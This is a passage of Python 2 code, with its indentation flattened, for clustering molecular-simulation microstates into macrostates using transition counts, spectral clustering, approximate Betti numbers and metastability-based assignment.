print "(OUTPUT) \t", i, "\t", pLevelNumMacro[counter]
counter+=1
print "(OUTPUT) ", "Sum of the differences of the spectral gaps:"
for i in pLevelSGQuality:
print "(OUTPUT) ", i
print "(OUTPUT) ", "Density levels scan DONE. Proceding to the SHC clustering!"
return pLevels
def removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros):
print "(OUTPUT) ", ("Removing barely connected microstates with a cut off <%d transitions (in or out) (EXPERIMENTAL)" % numRemoveBarelyConnectedMicros)
counter=0
originalMicrosCountM = originalMicrosCountM.todense()
for i in range (0, originalMicrosCountM.shape[0]):
if (((originalMicrosCountM[i,:].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 ) or ((originalMicrosCountM[:,i].sum() - originalMicrosCountM[i,i] - numRemoveBarelyConnectedMicros) < 0 )):
counter+=1
originalMicrosCountM[i,:] = 0
originalMicrosCountM[:,i] = 0
print "(OUTPUT) ", ("Removed %d barely connected microstates (turn to pop 0)..." % counter)
originalMicrosCountM = csc_matrix(originalMicrosCountM)
return(originalMicrosCountM)
def writeMacrostateMap(outName, nMicro, ci, connectedMicrosIndex):
print "(OUTPUT) ", ("Writting macrostate maping file: %s" % outName)
f = open(outName,'w')
micro2macro = zeros((nMicro), int)
micro2macro[connectedMicrosIndex] = ci
for i in range(0, nMicro):
line = (micro2macro[i]-1)
print >>f, line
f.close()
print "(OUTPUT) ", ("Done writting macrostate maping file!")
def writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, nMicro):
print "(OUTPUT) ", ("Writting macrostate assignments to:")
micro2macro = zeros((nMicro), int)
micro2macro[connectedMicrosIndex] = ci
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
sys.stdout.write('(OUTPUT) %s' % filenameInp)
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
output = []
for line in file(filenameInp):
line=line.strip().split()
if (int(line[0]) > -1):
lineout="%d %d" %( int(line[0]), (micro2macro[int(line[0])] -1))
else:
lineout="%d -1" %( int(line[0]))
output.append(lineout)
f = open(filenameInp,'w')
for line in output:
print >>f, line
f.close()
print "\n", "(OUTPUT) ", ("Done writting macrostate assignments!")
def getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles,bJumpWindow):
originalNumOfMicros=0
totalCounts=0
numberOfTrajs=0
print "(OUTPUT) ", ("Assesing the number of microstates...")
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
numberOfTrajs+=1
sys.stdout.write('(OUTPUT) %s' % filenameInp)
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
for line in file(filenameInp):
line = line.strip().split()
line = int(line[0])
if (line > originalNumOfMicros):
originalNumOfMicros = line
if (originalNumOfMicros>0):
originalNumOfMicros+=1
print "(OUTPUT) ", ("Found %d microstates in %d trajectories" % (originalNumOfMicros, numberOfTrajs))
elif (originalNumOfMicros==0):
print "(OUTPUT) ", ("Found 0 microstates in %d trajectories, cannot continue!", numberOfTrajs)
exit(0)
print "(OUTPUT) ", ("Reading microstates assignments from files and counting transitions:")
originalMicrosCount= lil_matrix((originalNumOfMicros, originalNumOfMicros))
tmpLineLen=0
for filenameInp in file(trajlistfiles):
filenameInp = filenameInp.strip()
filenameInp = "%s/assignments/%s" % (headDir,filenameInp)
tmpLineLen=len(filenameInp)+10
for i in range (0, tmpLineLen):
sys.stdout.write('\b')
previousm=-1
trajLength = 0
for line in file(filenameInp):
trajLength += 1
###NEXT IS SLIDING WINDOW###
if ( bJumpWindow == 0 ):
trajectory=zeros ((trajLength), int)
for i in range (1, trajLength):
line = linecache.getline(filenameInp, i).strip().split()
trajectory[i] = line[0]
for i in range (0, trajLength-tLag):
if ((trajectory[i] >= 0) & (trajectory[i+tLag]>= 0)) :
originalMicrosCount[trajectory[i], trajectory[i+tLag]]+=1
###END SLIDING WINDOW###
###NEXT IS JUMP WINDOW###
if ( bJumpWindow == 1 ):
trajectory=zeros ((trajLength/tLag)+1, int)
for i in range (0, trajLength): #Qin's Fix (THX)
line = linecache.getline(filenameInp, i+1).strip().split()
if(i%tLag==0): #Qin's Fix (THX)
trajectory[i/tLag]=(int(line[0]))
for i in range(0, (trajLength/tLag)-1):
if ((trajectory[i] >= 0) & (trajectory[i+1]>= 0)) :
originalMicrosCount[trajectory[i], trajectory[i+1]]+=1
###END JUMP WINDOW##
print "\n", "(OUTPUT) ", ("Finished with microstates count!")
print "(OUTPUT) ", ("Total number of microstate transitions: %d" % originalMicrosCount.sum() )
originalMicrosCount = originalMicrosCount.tocsc()
emptyNumber=0
for i in range (0, originalNumOfMicros):
if ((originalMicrosCount[i,:].sum() + originalMicrosCount[:,i].sum()) == 0):
emptyNumber+=1
print("Warning microstate %d is empty!" % i)
if(emptyNumber > 0):
print "(OUTPUT) ", ("Warning, there are %d empty microstates" % emptyNumber)
print "(OUTPUT) ", ("There are %d non-empty microstates" % (originalMicrosCount.shape[0]-emptyNumber))
return (originalMicrosCount)
def writeCountMatrix ( originalMicrosCount, outMicroCountMatrixName, message, doWriteTXT):
print "(OUTPUT) ", (message)
scipy.io.mmwrite(outMicroCountMatrixName, originalMicrosCount, field="integer")
if (doWriteTXT == 1):
print "(OUTPUT) Writing (also) a count matrix in TXT format! (May be very slow, be patient)"
outMicroCountMatrixName="%s.txt"%(outMicroCountMatrixName)
f = open(outMicroCountMatrixName,'w')
advanceCounter=0.0
numMicros=originalMicrosCount.shape[0]
originalMicrosCount=originalMicrosCount.tolil()
outline="0.0% Complete"
sys.stdout.write('(OUTPUT) %s' %outline)
for i in range(0, numMicros):
advanceCounter+=1.0
print advanceCounter, numMicros
line=" "
for j in range(0, numMicros):
line+= str(int(originalMicrosCount[i,j])) + " "
print >>f, line
if (advanceCounter >= (numMicros/100.0)):
for k in range (0, len(outline)+10):
sys.stdout.write('\b')
sys.stdout.write('(OUTPUT) %s' % outline)
outline="%.1f%% Complete " % ((i+1)*100/numMicros)
advanceCounter=0
print "\n", "(OUTPUT) ", ("Finished TXT write!")
f.close()
def getConnectedMicrostates (originalMicrosCount):
print "(OUTPUT) ", ("Searching connected microstates using graph theory")
microConnectedComponents=cs_graph_components((originalMicrosCount + originalMicrosCount.conj().transpose()))
componentsSize=zeros((microConnectedComponents[0]+1), int)
emptySize=0
for i in microConnectedComponents[1]:
if (i >= 0):
componentsSize[i+1]+=1
else:
emptySize +=1
indexMaxConnected, sizeMaxConnected = componentsSize.argmax(0), componentsSize.max(0)
lineout = ("Found %d connected microstates, %d disconnected microstates and %d empty microstates" % (sizeMaxConnected, (componentsSize.sum()-sizeMaxConnected), emptySize))
print "(OUTPUT) ", lineout
if ((emptySize > 0) | ((componentsSize.sum()-sizeMaxConnected) > 0)):
print "(OUTPUT) ", "Removing disconnected microstates"
connectedMicrosIndex = where(microConnectedComponents[1] == (indexMaxConnected-1))
connectedMicrosIndex = getIndexFromArray(connectedMicrosIndex[0])
connectedMicros = originalMicrosCount[ix_(connectedMicrosIndex,connectedMicrosIndex)]
else:
connectedMicros = originalMicrosCount
connectedMicrosIndex = range(0,componentsSize.sum())
return connectedMicros, connectedMicrosIndex
def readPlevels(fileName, cumulativeSumOfRows):
print "(OUTPUT) ", ("Reading density levels from file: %s" % fileName)
pLevels=[]
for line in file(fileName):
line = line.strip()
pLevels.append(float(line))
return (pLevels)
def cumulativeDesityFunctionOfHeightFilter(x):
total = sum(x)
x = -x
x.ravel().sort()
x = -x
y = x.cumsum(axis=0)/total
return y
def getIndexFromMatrix(indexA):
xx = indexA
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[i,0])
return(xxx)
def getIndexBFromMatrix(indexB):
xx = indexB
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[0,i])
return(xxx)
def getIndexFromArray(indexA):
xx = indexA
xxx=[]
for i in range (0, len(xx)):
xxx.append(xx[i])
return(xxx)
def IntList2array(listA):
xx = listA
xxx= zeros((len(listA)),int)
for i in range (0, len(xx)):
xxx[i] = xx[i]
return(xxx)
def apBetti(X, filterX, levels):
print "(OUTPUT) ", ("Computing persistent aproximate betti numbers via spectral gaps")
#X = X.tocsc()
ig = filterX/(max(filterX))
#print "PPC",filterX, (max(filterX))
ig = -ig
rk = ig.argsort(axis=0)
ig.sort(axis=0)
ig = -ig
MAXNUMBEREIG = 20;
k = MAXNUMBEREIG
eps = 1e-4
randSurf = 1e-1
N = len(filterX)
revecs = []
revals = []
Components = []
specGaps = []
aBettis = []
for i in range (0, len(levels)):
revecs.append(0)
revals.append(0)
Components.append(0)
specGaps.append(0)
aBettis.append(0)
print "(OUTPUT) ", ("Level\tSize\t#Comp\tB0_1\tGap_1\t\tB0_2\tGap_2\t\tB0_3\tGap_3")
for i in range (0, len(levels)):
if (levels[i] > 1):
n = int(levels[i])
else:
n = int(sum(ig>=levels[i]))
outline= ("%d\t %d\t"%(i,n));
if (n == 1):
Components[i] = 1
specGaps[i] = ones(MAXNUMBEREIG);
aBettis[i] = [1, zeros(MAXNUMBEREIG-1)]
else:
tmpindx = getIndexFromMatrix(rk[0:n])
Y = csc_matrix(((X[ix_(tmpindx,tmpindx)])) + (eps*identity(n)) +(randSurf * ones((n,n), float)/n))
Y2 = zeros((n,n))
tmparray=[]
for j in Y.sum(axis=1):
tmparray.append(j[0,0])
Y2[diag_indices(n)]= tmparray
Y2 = csc_matrix(Y2)
sigma = 1+eps+randSurf
B = Y - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
if ((n-4) > MAXNUMBEREIG):
# revals[i],revecs[i] = ARPACK_gen_eigs( Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXNUMBEREIG, 'LM' )
revals[i],revecs[i] = eigs( Y, MAXNUMBEREIG, Y2, sigma, which='LM', maxiter=10000 )
else:
revals[i],revecs[i] = scipy.linalg.eig( Y.todense(),Y2.todense() )
revals[i]=real(revals[i])
#SORT EIGENVALUES AND EIGENVECTORS
tmpindsort = argsort(-revals[i])
revals[i] = revals[i][tmpindsort]
revecs[i] = revecs[i][:, tmpindsort] # second axis !!
if (n > MAXNUMBEREIG):
revals[i] = revals[i][:MAXNUMBEREIG]
revecs[i] = revecs[i][:, :MAXNUMBEREIG]
#Remove later DASM
# tmplineout=""
# for ii in revals[i]:
# tmplineout+=" "+ str(ii)
# print "(DEBUG) Using a matrix of %ix%i, eigenvalues are:\n(DEBUG) \t" %((n-4),(n-4)), tmplineout
#END REMOVE#
Components[i] = sum(revals[i]>(1-1e-5))
tmpSpecGaps = -(abs(diff(revals[i])))
aBettis[i] = tmpSpecGaps.argsort(axis=0)
for xx in range (1, len(revals[i])): #FIX for eigenvalues = 1.0 on lowlevels
if ((revals[i][xx]+1e-5) >= 1) and (aBettis[i][0] < xx):
aBettis[i][0]+=1
else:
break
tmpSpecGaps.sort(axis=0)
specGaps[i] = -tmpSpecGaps
outline += ('%d\t'% Components[i])
for gaplist in range (0, min(3,len(aBettis[i]))):
outline += ('%d\t %f\t'%(aBettis[i][gaplist], specGaps[i][gaplist]));
print "(OUTPUT) ", outline
print "(OUTPUT) ",("Done with betti numbers!")
return (aBettis, specGaps)
def superLevelSet(filterX, levels, clusters):
ig = -filterX
idd = ig.argsort(axis=0)
ig.sort(axis=0)
ig = -ig
superLevelSetId = []
superLevelSetIg = []
for i in range (0, len (levels)):
superLevelSetId.append(np.copy(idd[0:levels[i]]))
superLevelSetIg.append(np.copy(clusters[i]))
return (superLevelSetId, superLevelSetIg)
def superMapper (X,superLevelSet):
print "(OUTPUT) ", ('Executing the SMapper')
numPoints = X.shape[0]
dim = X.shape[1]
if (dim!=numPoints):
print "(OUTPUT) ", ('ERROR: the input for the mapper must be a symmetric transition count matrix!')
sys.exit()
numLevels = len(superLevelSet[0])
lengthX = []
idxSort = []
for i in range (0, numLevels):
lengthX=concatenate((lengthX,len(superLevelSet[0][i])), axis=None)
tmpReshape = superLevelSet[0][i].reshape(1,lengthX[i])
tmpReshape2 = []
for j in range (0, size(tmpReshape, axis=1)):
tmpReshape2.append(np.copy(tmpReshape[0,j]))
idxSort=concatenate((idxSort,tmpReshape2), axis=None)
Y = X[ix_(idxSort,idxSort)];
print "(OUTPUT) ", ("SMapper:\tnumber of points %d" % numPoints);
print "(OUTPUT) ", ("\t\tnumber of levels %d" % len(superLevelSet[0]));
numGraphNodes = 0
nodeInfoLevel = []
nodeInfoLevelSize = []
nodeInfoSet = []
nodeInfoFilter = []
levelIdx = []
adja = []
ci = []
csize = []
numCluster = []
for level in range (0, len(superLevelSet[0])):
index1= getIndexFromMatrix(superLevelSet[0][level])
data = (X[ix_(index1,index1)])
citmp, csizetmp, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight = spectralClustering(data,superLevelSet[1][level])
ci.append(np.copy(citmp))
csize.append(np.copy(csizetmp))
numCluster.append(len(csize[level]))
print "(OUTPUT) ", ("Level %d has %d macrostates out of %d microstates" % (level ,numCluster[level], data.shape[0]))
numGraphNodes = len(nodeInfoLevel)
for i in range (0,numCluster[level]):
new_node = i + numGraphNodes
if (i==0):
levelIdx.append(np.copy([new_node]))
else:
levelIdx[level] = concatenate((levelIdx[level],new_node), axis=None)
nodeInfoLevel.append(np.copy(level));
nodeInfoLevelSize.append(data.shape[0])
thisNodeIndex = where(ci[level]==i)
nodeInfoSet.append(np.copy(superLevelSet[0][level][thisNodeIndex]))
nodeInfoFilter.append(np.copy(level))
if(level > 0):
prevLvlIdx = levelIdx[level-1]
thisLvlIdx = levelIdx[level]
for i in range (0,len(prevLvlIdx)):
for j in range (0,len(thisLvlIdx)):
a = prevLvlIdx[i]
b = thisLvlIdx[j]
N_ab = len(intersect1d(getIndexFromMatrix(nodeInfoSet[a]),getIndexFromMatrix(nodeInfoSet[b])));
if (N_ab > 0):
adja.append(np.copy([a,b,N_ab]))
adjaArray = array2matrix(adja, len(nodeInfoLevel))
if (numLevels == 1):
adjaArray = zeros((len(nodeInfoLevel),len(nodeInfoLevel)),int)
print "(OUTPUT) ", ('SMapper done...')
return(adjaArray, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize)
def array2matrix(arr, lenArra):
result = zeros((lenArra,lenArra),int)
for i in arr:
result[i[0]][i[1]]= i[2]
result[i[1]][i[0]]= i[2]
return (result)
def spectralClustering(X,k):
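  # Added note: recursive spectral bisection - starting from a single cluster holding every
  # microstate, the leaf with the largest variance along the next eigenvector is split at the
  # mean of its Fiedler vector until k clusters exist; the conductance of every cut is stored
  # so that small or poorly separated clusters can be filtered out afterwards.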
clusterSizeThreshold=0
n = X.shape[0];
eps = 1e-4
randSurf = 1e-1
MAXCLUSTER = min(50,n)
Y = csc_matrix(X + (eps*eye(n,n)) +(randSurf * ones((n,n), float)/n))
Y2 = zeros((n,n))
tmparray=[]
for j in Y.sum(axis=1):
tmparray.append(np.copy(j[0,0]))
Y2[diag_indices(n)]= tmparray
Y2 = csc_matrix(Y2)
sigma = 1+eps+randSurf
B = Y - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
# printDebug(MAXCLUSTER, "MAXCLUSTER")
printDebug(n, "N")
#SPARCE matrix solver HAVES SOME PROBLEM since can return eigenvalues = 0.0, maybe increment the number of cycles DASM#
if ((n-4) > MAXCLUSTER):
# specVals,specVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, MAXCLUSTER-1, 'LM')
specVals,specVecs = eigs( Y, MAXCLUSTER-1, Y2, sigma, which='LM',maxiter=10000 )
printDebug(specVals,"Specvals1a")
else:
specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense())
specVals=real(specVals)
printDebug(specVals,"Specvals1b")
#END#
#NEXT temporary fix
# specVals,specVecs = scipy.linalg.eig(Y.todense(),Y2.todense())
# specVals=real(specVals)
#END fix
# #SORT EIGENVALUES AND EIGENVECTORS
tmpindsort = argsort(-specVals)
specVals = specVals[tmpindsort]
specVecs = specVecs[:, tmpindsort] # second axis !!
# if (n > MAXCLUSTER):
# specVals = specVals[:MAXCLUSTER]
# specVecs = specVecs[:, :MAXCLUSTER]
printDebug(specVals, "SpecvalsSortShort")
specGaps = -(abs(diff(specVals)))
numComponents = sum(specVals>1-(1e-10))
#TODO: add this DASM#
#if numComponents>1,
# cluster_tree{1}.left = 2;
# cluster_tree{1}.right = 3;
# for i=1:numComponents,
# mn = mean(abs(spectrum.vecs(:,i)));
# cluster_tree{i+1}.data = find(abs(spectrum.vecs(:,i))>=mn);
# cluster_tree{i+1}.left = 0;
# cluster_tree{i+1}.right = 0;
# id_complement = find(abs(spectrum.vecs(:,i))<mn);
# cluster_tree{i+1}.conduct = sum(sum(X(cluster_tree{i+1}.data,id_complement)))/sum(sum(X(cluster_tree{i+1}.data,cluster_tree{i+1}.data)));
# end
#end
#END TODO#
cluster_treeData=[]
cluster_treeData.append(range(0,n))
cluster_treeLeft = [0]
cluster_treeRight = [0]
cluster_treeConduct = [0]
printDebug(numComponents,"numComponents")
printDebug(k+1,"k+1")
for i in range (numComponents, k+1): #k is the number of components identified by Betty numbers
tree_size = len(cluster_treeData)
variation = zeros((tree_size))
for j in range (0, tree_size):
if ((cluster_treeLeft[j] == 0) and (cluster_treeRight[j] == 0)):
tmp = specVecs[cluster_treeData[j], i]
if (len(tmp) > 1):
variation[j] = (var(tmp)*len(tmp)/(len(tmp)-1));
else:
variation[j] = 0;
mx = variation.max(0)
ind = variation.argmax(0)
indices = cluster_treeData[ind]
printDebug(indices,"indices")
printDebug(len(indices),"lenindices")
nn = len(indices)
if (i==1):
Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn)
vecFiedler = specVecs[:,i]
else:
Xsplit = csc_matrix(X[ix_(indices,indices)]+eps*eye(nn,nn)+randSurf*ones((nn,nn))/nn)
Y2 = zeros((nn,nn))
tmparray=[]
for j in Xsplit.sum(axis=1):
tmparray.append(np.copy(j[0,0]))
Y2[diag_indices(nn)]= tmparray
Y2 = csc_matrix(Y2)
B = Xsplit - sigma*Y2
sigma_solve = dsolve.splu(B)
Y2L = aslinearoperator(Y2)
##TODO: maybe somethingWrongHere DASM##
if ((nn-4) > 20):
# splitVals,splitVecs = ARPACK_gen_eigs(Y2L.matvec, sigma_solve.solve, Y2L.shape[0], sigma, 3, 'LM')
splitVals,splitVecs = eigs( Xsplit, 3, Y2, sigma, which='LM',maxiter=10000 )
else:
splitVals,splitVecs = scipy.linalg.eig(Xsplit.todense(),Y2.todense())
splitVals=real(splitVals)
##END ToDo##
##SORT EIGENVALUES AND EIGENVECTORS##
tmpindsort = argsort(-splitVals)
splitVals = splitVals[tmpindsort]
splitVecs = splitVecs[:, tmpindsort] # second axis !!
if (nn > 3):
splitVals = splitVals[:3]
splitVecs = splitVecs[:, :3]
if (len(splitVecs[0]) > 1):
vecFiedler = splitVecs[:,1]
else:
vecFiedler = splitVecs
left_indices = (vecFiedler < vecFiedler.mean()).nonzero()[0]
right_indices = (vecFiedler >= vecFiedler.mean()).nonzero()[0]
if ((min(len(left_indices),len(right_indices))) > 0): #ARPACK needs matrix >=5 to get speigs
lind = tree_size + 1
rind = tree_size + 2
cluster_treeLeft[ind] = lind
cluster_treeRight[ind] = rind
indices = IntList2array(indices)
cluster_treeData.append(indices[left_indices])
cluster_treeData.append(indices[right_indices])
cluster_treeLeft.append(0)
cluster_treeRight.append(0)
cluster_treeLeft.append(0)
cluster_treeRight.append(0)
if (len(left_indices)==1):
left_indices = concatenate((left_indices[0], left_indices[0]), axis=None)
if (len(right_indices)==1):
right_indices = concatenate((right_indices[0], right_indices[0]), axis=None)
cut = Xsplit[ix_(left_indices,right_indices)].sum()
volume_left = Xsplit[ix_(left_indices,left_indices)].sum()
volume_right = Xsplit[ix_(right_indices,right_indices)].sum()
cluster_treeConduct.append(cut/min(volume_left,volume_right))
cluster_treeConduct.append(cut/min(volume_left,volume_right))
leaves = []
leaveSize = []
ci = zeros((n), int)
if ((clusterSizeThreshold > 0) and (clusterSizeThreshold < 1)):
clusterSizeThreshold = around(clusterSizeThreshold*n);
else:
clusterSizeThreshold = around(clusterSizeThreshold);
for i in range (0, len(cluster_treeData)):
if ((cluster_treeLeft[i] == 0) and (cluster_treeRight[i] == 0)):
if (len(leaves) == 0):
leaves = [i]
ci[cluster_treeData[i]] = 1
else:
leaves = concatenate((leaves,i), axis=None)
ci[cluster_treeData[i]] = len(leaves)
# print leaves #Funny that makes an extra cicle?
leaveSize = zeros((len(leaves)))
for i in range (0,len(leaves)):
leaveSize[i] = sum(ci == (i+1))
idd = (leaveSize >= clusterSizeThreshold).nonzero()[0]
csize = np.copy(leaveSize[idd])
ci = zeros((n),int)
conduct = zeros((len(idd)));
for i in range (0, len(idd)):
ci[cluster_treeData[leaves[idd[i]]]]=i
conduct[i] = cluster_treeConduct[leaves[idd[i]]]
return(ci, csize, specVals, specVecs, specGaps, conduct, cluster_treeData, cluster_treeConduct, cluster_treeLeft, cluster_treeRight)
def flowGrad(G, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter):
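  # Added note: dG is the upper-triangular (level-ordered) part of the node adjacency, so
  # edges only point toward later-level nodes; nodes without incoming edges are treated as
  # local maxima, and the normalised transition matrix raised to the number of levels is used
  # as the equilibrium flow that maps every node onto one of those maxima.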
numLevel = len(levelIdx)
dG = triu(G);
y=[]
localMax = (where(dG.sum(axis=0)[0] == 0))[1].transpose()
dd = zeros((len(G)), int);
for i in range (0,len(localMax)):
dd[localMax[i]] = len(nodeInfoSet[localMax[i]]);
dG = dG + diag(dd)
  # matrix power (reachability after numLevel steps); "^" would be bitwise XOR in Python
  dG_inf = np.linalg.matrix_power(dG, numLevel)
for i in range (0,len(G)):
y.append(where(dG_inf[:,i] > 0))
dGdivsum = getIndexFromMatrix((1.0/dG.sum(axis=0)).transpose())
MarkovT = dG * diag(dGdivsum)
yLocalMax = localMax
yGradFlow = dG
yEquilibriumEQ = MarkovT**numLevel
print "(OUTPUT) ", ("Number of local maxima: %d" % len(localMax))
return(yLocalMax, yGradFlow, yEquilibriumEQ)
def optimumAssignment(X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations):
print "(OUTPUT) ", ("Finding Optimum Assignments")
numMicro = max(X.shape[0], X.shape[1])
numNode = len(nodeInfoSet)
MacroStates = (where(diag(cptEquilibriumEQ)==1)[0]).transpose()
numMacro = len(MacroStates)
if numMacro == 1:
print "(OUTPUT) ", ("SHC has found only one Macrostate! Noting to optimize...")
ci = ones((numMicro), int)
csize = numMicro
fassign = []
T = []
Qmax = 1
id_fuzzy = []
return(ci, csize, fassign, T, Qmax, id_fuzzy)
print "(OUTPUT) ", ("Optimum assignments Done...")
distEQ = cptEquilibriumEQ[MacroStates,:]
ci = zeros((numMicro), int);
id_macro = []
# deterministic assignment on basins of local maxima
for i in range (0, numMacro):
macroBasin = (where(distEQ[i,:] == 1)[1]).transpose()
for j in range (0, len(macroBasin)):
if (j==0):
id_macro.append(np.copy(nodeInfoSet[macroBasin[j]]))
id_macro[i] = union1d(getIndexFromMatrix(id_macro[i]),getIndexFromMatrix(id_macro[i]))
else:
id_macro[i] = union1d(id_macro[i],getIndexFromMatrix(nodeInfoSet[macroBasin[j]]))
ci[id_macro[i]] = i+1 #Take care that ci is +1 since it maps microstates numbers, 0 is for fussy
# fuzzy microstates on barrier
id_fuzzy = (where(ci==0))[0]
print "(OUTPUT) ", ("Number of barrier microstates: %d" % len(id_fuzzy))
# Construct new transition count matrix from X
T = eye((numMacro+len(id_fuzzy)), (numMacro+len(id_fuzzy)))
T = T.tolil()
Xdense = X.todense()
# for i in range (0, numMacro):
# row_id = where(ci==(i+1))
# for j in range (i, numMacro):
# # print i, j
# col_id = where(ci==(j+1))
# T[i,j] = X[row_id,col_id].sum()
# #print len(id_fuzzy)
# for j in range (1, len(id_fuzzy)):
# # print i, j
# tmpindx=array([id_fuzzy[j]])
# T[i,j+numMacro] = X[row_id,tmpindx].sum()
for i in range (0, numMacro):
row_id = where(ci==(i+1))[0]
for j in range (i, numMacro):
col_id = where(ci==(j+1))[0]
T[i,j] = Xdense[ix_(row_id,col_id)].sum()
#print len(id_fuzzy)
for j in range (1, len(id_fuzzy)):
tmpindx=array([id_fuzzy[j],id_fuzzy[j]])
T[i,j+numMacro] = Xdense[ix_(row_id,tmpindx)].sum()
T = T + (triu(T,1)).transpose()
T = T.todense()
# print "(OUTPUT) SLOW 1"
T[numMacro:(numMacro+len(id_fuzzy)),numMacro:(numMacro+len(id_fuzzy))] = Xdense[ix_(id_fuzzy,id_fuzzy)]
# print "(OUTPUT) SLOW 2"
d = T.sum(axis=1)
n = d.shape[0]
dd = zeros((n,n))
tmparray=[]
# print "(OUTPUT) SLOW 3"
for j in d:
tmparray.append(1.0/j[0,0])
dd[diag_indices(n)]= tmparray
# print "(OUTPUT) SLOW 4"
# dd = lil_matrix((n,n))
# jj=0
# for j in (d):
# if (j[0,0] > 0):
# dd[jj,jj]=(1.0/j[0,0])
# else:
# dd[jj,jj]= 0 #Is this correct? Why this could happen?
# jj+=1
dd = csc_matrix(dd)
T = csc_matrix(T)
# print "(OUTPUT) SLOW 5"
M = T*dd
# print "(OUTPUT) SLOW 6"
Mp = M.todense()
# print "(OUTPUT) SLOW 7"
# print Mp.sum()
eps = 1e-4 # small for tie-breaker
fass = zeros((numMacro, (numMacro+len(id_fuzzy))))
# print "(OUTPUT) SLOW 8"
for i in range(0, numMacro):
# print "(OUTPUT) SLOW 8a", i
fass[i][i]=1
# print "(OUTPUT) SLOW 9"
fass[:,numMacro:] = Mp[:numMacro,numMacro:]
iterN = 0
fassign=[]
id_domore=[]
CI=[]
CSIZ=[]
Q=[]
fassign.append(copy(fass))
fass_sort = -fass
id_fass_sort = fass_sort.argsort(axis=0)
fass_sort.sort(axis=0)
fass_sort= -fass_sort
id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0])
print "(OUTPUT) ", ("Number of empty assignments: %d" % len(id_domore[iterN]));
CI.append(copy(ci))
CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:])
CSIZ.append(hiscMacro(CI[iterN]))
Q.append(metastability(X,CI[iterN]))
numMacro = ci.max(0)
print "(OUTPUT) ", ("Num of macrostates: %d" % ci.max(0))
print "(OUTPUT) ", ("Metastability (Q) = %.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)))
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
fassigne =[]
while ((id_domore[iterN].size>0) and (iterN < maximumAssignIterations)):
iterN = iterN + 1
print "(OUTPUT) ", ("*Iteration %d" % iterN)
numMacro = ci.max(0)
print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0))
Mp = Mp*M
fass[:,id_domore[iterN-1]] = Mp[:numMacro,id_domore[iterN-1]]
fass_sort = -fass
id_fass_sort = fass_sort.argsort(axis=0)
fass_sort.sort(axis=0)
fass_sort= -fass_sort
id_domore.append((where ((fass_sort[0,:] < eps) | ((fass_sort[0,:]-fass_sort[1,:])<eps)))[0])
print "(OUTPUT) ", ("Number of empty assignment: %d" % len(id_domore[iterN]));
# Method I (first-reach diffusion): find the optimal assignment
CI.append(copy(ci))
CI[iterN][id_fuzzy] = 1+(id_fass_sort[0,numMacro:])
CSIZ.append(hiscMacro(CI[iterN]))
Q.append(metastability(X,CI[iterN]))
print "(OUTPUT) ", ("(Q) I (first-reach) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)));
# print Qmax, Q[iterN]
if (Qmax < Q[iterN]):
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
# print ci
# Method II (all-iteration diffusion): rearrange the fuzzy assignment by the last iteration of Mp
numMacro = ci.max(0)
print "(OUTPUT) ", ("Number of macrostates: %d" % ci.max(0))
fassign.append(copy(fass)) #Copy the array to avoid creating a pointer (THX Raymond)
fassign[iterN][:,numMacro:] = Mp[:numMacro,numMacro:]
fassign[iterN][:,id_domore[iterN]] = (ones((numMacro,len(id_domore[iterN])))/numMacro);
F_rowsort = -fassign[iterN]
id_rowsort = F_rowsort.argsort(axis=0)
F_rowsort.sort(axis=0)
F_rowsort = -F_rowsort
CI[iterN][id_fuzzy] = id_rowsort[0,numMacro:]
CSIZ[iterN]=hiscMacro(CI[iterN])
Q[iterN] = metastability(X,CI[iterN])
print "(OUTPUT) ", ("(Q) II (all-iteration) = \t%.3f (%2.2f%%)" % (Q[iterN], (Q[iterN]/numMacro*100)));
if (Qmax < Q[iterN]):
Qmax = Q[iterN]
iter_max = iterN
ci = np.copy(CI[iterN])
csize = np.copy(CSIZ[iterN])
# print ci
print "(OUTPUT) ", ("---- Maximal metastability reached at iteration %d: %f (%2.2f%%) ----\n" % (iter_max,Qmax,(Qmax/numMacro*100)))
print "(OUTPUT) ", ("---- Final number of macrostates: %d ----\n" % ci.max(0))
print "(OUTPUT) ", ("Optimum assignments Done...")
return(ci, csize, fassign, T, Qmax, id_fuzzy)
def metastability(X,ci):
#Compute the metastability according to macro-clustering ci
numMacro=max(ci);
idX=[]
for i in range(0,numMacro):
idX.append(where(ci==(i+1))[0])
if (len (idX[i]) == 1):
idX[i] = [idX[i][0],idX[i][0]]
